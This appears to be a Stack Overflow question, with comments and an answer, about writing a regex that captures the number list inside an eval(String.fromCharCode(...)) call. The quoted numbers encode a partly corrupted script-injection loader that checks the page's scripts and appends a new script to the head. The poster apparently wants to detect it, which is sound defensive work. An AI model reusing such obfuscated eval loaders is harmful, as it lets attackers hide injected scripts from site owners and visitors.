# RegEx example for fromcharcode

Tags: javascript, regex, fromcharcode

This is a rudimentary question but what is the best regex expression to capture a fromcharcode range and making it efficient and extensible?

To start off up to the number range, what is the best way to capture the number range section making it extensible:

```
eval(String.fromCharCode(5, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 6109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 3249, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 52, 57, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 53, 49, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 105, 102, 32, 40, 44, 32, 49, 49, 53, 44, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125));
```

To write something that can be applied to this and expanded on.

Comment: To capture this entire range while remaining quick and efficient. I'm just curious of how to effectively write the (...) number range portion. And need guidance with that.

Comment: Sorry, I was referring to every number inside of the (). (23, 33, 44, 101 etc.) The range could vary but I am looking for a way to write this to the total length of numbers in the parentheses can change.

Comment: Here you go `1(?:0[0-589]|1[0-24-8]|2[0135])|3(?:2(?:49)?|[49])|4[014-689]|5[0-79]?|6(?:1(?:09)?|[2679])|7[89]|8[34]|9[1379]` https://regex101.com/r/o8DbSQ/1

Comment: Thanks for that but there some more generic that can be written to capture the number range not necessarily the numbers themselves as these can change over time? Something like a \(.{0,500} ? Or is there a better range to capture a range?

Comment: I guess the real question is to convert it to characters when you get the codes, wherever you get them from, eh ? I voted to close this unclear question.

Comment: Btw, the decimal range of 0 - 256 in regex form is  `\b(?:\d|[1-9]\d|1\d{2}|2[0-4]\d|25[0-6])\b` https://regex101.com/r/mL9gp2/1

Comment: Yes, something like that but for now I was looking for the best way to capture a range other than {0,500} or {0,1000} etc.

Comment: Well, the range is 1 dimensional in text form, it's just how you define it. There is a [Tool](http://www.regexformat.com/version7_files/Rx5_ScrnSht0.jpg) that does all this for you, just put in the range you need.

Comment: What is your goal? You get the whole digit part with eg [`(?:\d+, ?)*\d+`](https://regex101.com/r/KzceDF/3/)

Answer (score 1):

I'm positive that regular expressions are superbly unnecessary here for handling this task, which we simply have a reasonable list of integers, which we can use arrays, apply `split` or `join` and perform range check/validation in any forms that we wish, with scripting, yet if that may not be an option, we would start with a simple expression to filter out our numbers and start from there:

```
([0-9]+)(,\s)?
```

```js
const regex = /([0-9]+)(,\s)?/gm;
const str = `5, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 6109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 3249, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 52, 57, 44, 32, 52, 54, 44, 32, 52, 56, 44, 32, 52, 54, 44, 32, 53, 49, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 105, 102, 32, 40, 44, 32, 49, 49, 53, 44, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61,, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125`;
let m;

while ((m = regex.exec(str)) !== null) {
    // This is necessary to avoid infinite loops with zero-width matches
    if (m.index === regex.lastIndex) {
        regex.lastIndex++;
    }
    
    // The result can be accessed through the `m`-variable.
    m.forEach((match, groupIndex) => {
        console.log(`Found match, group ${groupIndex}: ${match}`);
    });
}
```

#### [Demo](https://regex101.com/r/PynYZP/1/)